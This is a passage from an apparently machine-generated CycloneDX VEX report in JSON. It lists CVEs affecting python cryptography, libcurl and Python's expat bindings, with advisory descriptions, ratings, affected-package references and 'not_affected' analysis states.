          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69248",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        295
      ],
      "description": "cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, if an intermediate constrained CA permits the DNS name foo.example.com, and the leaf certificate has a wildcard in its DNS SAN of *.example.com, python-cryptography's verifier accepts which allows escaping outside of the permitted names. The core issue is in DNSConstraint::matches, where a wildcard pattern was treated as matching a more-specific permitted constraint even though *.example.com can expand to sibling names such as bar.example.com outside foo.example.com. This allows acceptance of an invalid certificate chain. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69248"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4d035a4225965edeffd312079a510ef25fcfdcb2"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14888"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-m2h6-j472-rp4c"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T16:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-69249",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [],
      "cwes": [
        400
      ],
      "description": "python-cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 49.0.0, when resolving invalid certificate chains that include duplicate copies of self-signed certificates, the processing recursively invokes the same candidate, leading to an exponential blowup. Although the limitation that the chain depth cannot exceed a specified maximum depth prevents unbounded recursion and guarantees termination, an attacker-controlled certificate chain can lead the processing to easily take more than 5s to reject in testing. This amplification could form the basis for a resource exhaustion denial of service attack. The core issue arises in the recursive nature of build_chain_inner, which does not de-duplicate against previously analyzed candidates. As the correctness of validation is not affected, the integrity of a system cannot be compromised through this vector, only its availability. This issue is fixed in 49.0.0.",
      "recommendation": "Upgrade cryptography to version 49.0.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-69249"
        },
        {
          "url": "https://github.com/pyca/cryptography"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/4a12cf49675a184e47f912b00b04f3a629283582"
        },
        {
          "url": "https://github.com/pyca/cryptography/pull/14960"
        },
        {
          "url": "https://github.com/pyca/cryptography/security/advisories/GHSA-jwv3-5hgf-82ww"
        }
      ],
      "published": "2026-08-03T22:16:52+00:00",
      "updated": "2026-08-04T15:16:43+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/cryptography@46.0.7",
          "versions": [
            {
              "version": "46.0.7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:pypi/cryptography@46.0.7"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:pypi/cryptography@46.0.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-7168",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer over a specific HTTP proxy\n(`proxyA`) with **Digest** authentication and then changing the proxy host to\na second one (`proxyB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the `Proxy-Authorization:` header field meant for\n`proxyA`, to `proxyB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7168"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/14"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7168"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-7168.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-v92m-hrhj-gw54"
        },
        {
          "url": "https://hackerone.com/reports/3697719"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7168"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7168"
        }
      ],
      "published": "2026-05-13T13:01:57+00:00",
      "updated": "2026-06-17T11:01:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-7210",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        331
      ],
      "description": "`xml.parsers.expat` and `xml.etree.ElementTree` use insufficient entropy for Expat hash-flooding protection, which allows a crafted XML document to trigger hash flooding.\\r\\n\\r\\nFully mitigating this vulnerability requires both updating libexpat to 2.8.0 or later and applying this patch.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7210"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/13"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/11/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7210"
        },
        {
          "url": "https://github.com/python/cpython/commit/24b8f12544468e4cedf5bfbe25442fcd495391e4"
        },
        {
          "url": "https://github.com/python/cpython/commit/3573b3b1ecbd99030a0b18658e1bfece771b2566"
        },
        {
          "url": "https://github.com/python/cpython/commit/cbaecf9f16da611a646d507c1cbca265c588fc56"
        },
        {
          "url": "https://github.com/python/cpython/commit/e37df2a6a71d6538698e2d3188a7c345b827640b"
        },
        {
          "url": "https://github.com/python/cpython/commit/ea70712d1a8508e14e9677d44f838dab04dc0286"
        },
        {
          "url": "https://github.com/python/cpython/commit/eeea765cb9d8f1fc3d8918b272ac3c477983f27a"
        },
        {
          "url": "https://github.com/python/cpython/commit/fc9b11ff49cbc82e6f917d07a61517a2b5f3145f"
        },
        {
          "url": "https://github.com/python/cpython/issues/149018"
        },
        {
          "url": "https://github.com/python/cpython/pull/149023"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PNY5OMBDPM2FRUZTWFFPJ6LISWKV627K/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7210"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7210"
        }
      ],
      "published": "2026-05-11T18:16:42+00:00",
      "updated": "2026-08-14T01:19:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
